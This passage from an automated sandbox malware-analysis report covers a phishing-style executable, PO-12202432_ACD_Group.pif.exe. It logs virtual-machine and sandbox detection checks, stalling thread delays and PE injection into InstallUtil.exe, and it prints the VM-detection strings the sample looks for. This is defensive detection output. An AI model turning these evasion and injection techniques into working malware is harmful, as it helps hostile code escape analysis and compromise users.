                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Yara detected AntiVM3
                  Source: Yara matchFile source: Process Memory Space: PO-12202432_ACD_Group.pif.exe PID: 3668, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: IsNestedFamANDAssem.exe PID: 2300, type: MEMORYSTR
                  Queries memory information (via WMI often done to detect virtual machines)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory
                  Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                  Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                  Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory
                  Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                  Source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.2148862105.0000000002C3C000.00000004.00000800.00020000.00000000.sdmp, IsNestedFamANDAssem.exe, 00000005.00000002.2368359291.000000000311C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeMemory allocated: 1060000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeMemory allocated: 2BF0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeMemory allocated: 2950000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: E30000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2930000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 26F0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeMemory allocated: 1620000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeMemory allocated: 30D0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeMemory allocated: 50D0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2B70000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2D70000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 4D70000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeWindow / User API: threadDelayed 1531Jump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeWindow / User API: threadDelayed 3822Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 2848Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 6896Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeWindow / User API: threadDelayed 1209Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeWindow / User API: threadDelayed 3107Jump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe TID: 1492Thread sleep time: -15679732462653109s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe TID: 1492Thread sleep time: -100000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe TID: 7164Thread sleep count: 1531 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe TID: 7164Thread sleep count: 3822 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe TID: 1492Thread sleep time: -99891s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe TID: 1492Thread sleep time: -99778s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe TID: 1492Thread sleep time: -99672s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe TID: 1492Thread sleep time: -99563s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe TID: 1492Thread sleep time: -99438s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe TID: 1492Thread sleep time: -99313s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe TID: 1492Thread sleep time: -99203s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe TID: 1492Thread sleep time: -99094s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe TID: 1492Thread sleep time: -98969s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe TID: 1492Thread sleep time: -98860s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe TID: 1492Thread sleep time: -98695s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe TID: 1492Thread sleep time: -98594s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe TID: 1492Thread sleep time: -98481s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe TID: 1492Thread sleep time: -98371s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe TID: 1492Thread sleep time: -98264s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe TID: 1492Thread sleep time: -98156s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe TID: 1492Thread sleep time: -98038s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe TID: 1492Thread sleep time: -97922s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe TID: 1492Thread sleep time: -97810s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe TID: 1492Thread sleep time: -97704s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe TID: 1492Thread sleep time: -97579s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe TID: 1492Thread sleep time: -97454s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe TID: 1492Thread sleep time: -97329s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4084Thread sleep count: 35 > 30Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4084Thread sleep time: -32281802128991695s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2888Thread sleep count: 2848 > 30Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2888Thread sleep count: 6896 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe TID: 6444Thread sleep time: -11990383647911201s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe TID: 6444Thread sleep time: -100000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe TID: 3228Thread sleep count: 1209 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe TID: 3228Thread sleep count: 3107 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe TID: 6444Thread sleep time: -99875s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe TID: 6444Thread sleep time: -99766s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe TID: 6444Thread sleep time: -99656s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe TID: 6444Thread sleep time: -99547s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe TID: 6444Thread sleep time: -99438s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe TID: 6444Thread sleep time: -99328s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe TID: 6444Thread sleep time: -99219s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe TID: 6444Thread sleep time: -99107s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe TID: 6444Thread sleep time: -98992s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe TID: 6444Thread sleep time: -98890s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe TID: 6444Thread sleep time: -98776s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe TID: 6444Thread sleep time: -98647s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe TID: 6444Thread sleep time: -98519s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe TID: 6444Thread sleep time: -98391s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe TID: 6444Thread sleep time: -98281s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe TID: 6444Thread sleep time: -98172s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe TID: 6444Thread sleep time: -98063s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe TID: 6444Thread sleep time: -97938s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe TID: 6444Thread sleep time: -97828s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3872Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeThread delayed: delay time: 100000Jump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeThread delayed: delay time: 99891Jump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeThread delayed: delay time: 99778Jump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeThread delayed: delay time: 99672Jump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeThread delayed: delay time: 99563Jump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeThread delayed: delay time: 99438Jump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeThread delayed: delay time: 99313Jump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeThread delayed: delay time: 99203Jump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeThread delayed: delay time: 99094Jump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeThread delayed: delay time: 98969Jump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeThread delayed: delay time: 98860Jump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeThread delayed: delay time: 98695Jump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeThread delayed: delay time: 98594Jump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeThread delayed: delay time: 98481Jump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeThread delayed: delay time: 98371Jump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeThread delayed: delay time: 98264Jump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeThread delayed: delay time: 98156Jump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeThread delayed: delay time: 98038Jump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeThread delayed: delay time: 97922Jump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeThread delayed: delay time: 97810Jump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeThread delayed: delay time: 97704Jump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeThread delayed: delay time: 97579Jump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeThread delayed: delay time: 97454Jump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeThread delayed: delay time: 97329Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeThread delayed: delay time: 100000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeThread delayed: delay time: 99875Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeThread delayed: delay time: 99766Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeThread delayed: delay time: 99656Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeThread delayed: delay time: 99547Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeThread delayed: delay time: 99438Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeThread delayed: delay time: 99328Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeThread delayed: delay time: 99219Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeThread delayed: delay time: 99107Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeThread delayed: delay time: 98992Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeThread delayed: delay time: 98890Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeThread delayed: delay time: 98776Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeThread delayed: delay time: 98647Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeThread delayed: delay time: 98519Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeThread delayed: delay time: 98391Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeThread delayed: delay time: 98281Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeThread delayed: delay time: 98172Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeThread delayed: delay time: 98063Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeThread delayed: delay time: 97938Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeThread delayed: delay time: 97828Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: InstallUtil.exe, 00000002.00000002.4475159585.0000000005381000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_PhysicalMemoryPhysical Memory 0Win32_PhysicalMemoryPhysical MemoryPhysical MemoryPhysical MemoryRAM slot #0RAM slot #0VMware Virtual RAM00000001VMW-4096MBLMEM
                  Source: IsNestedFamANDAssem.exe, 00000005.00000002.2368359291.000000000311C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                  Source: IsNestedFamANDAssem.exe, 00000005.00000002.2368359291.000000000311C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
                  Source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.2163407938.0000000006430000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: HgfS5paYPq
                  Source: InstallUtil.exe, 00000002.00000002.4475159585.0000000005381000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Virtual RAM
                  Source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.2147980607.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll=
                  Source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.2163407938.0000000006430000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: GD7YGf2sqemUAekHdy6
                  Source: InstallUtil.exe, 00000002.00000002.4465370067.0000000000BB9000.00000004.00000020.00020000.00000000.sdmp, IsNestedFamANDAssem.exe, 00000005.00000002.2367145318.000000000141E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Injects a PE file into a foreign processes
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5AJump to behavior
                  Writes to foreign memory regions
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 76EFA6F0Jump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000Jump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000Jump to behavior
                  Source: C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 460000Jump to behavior
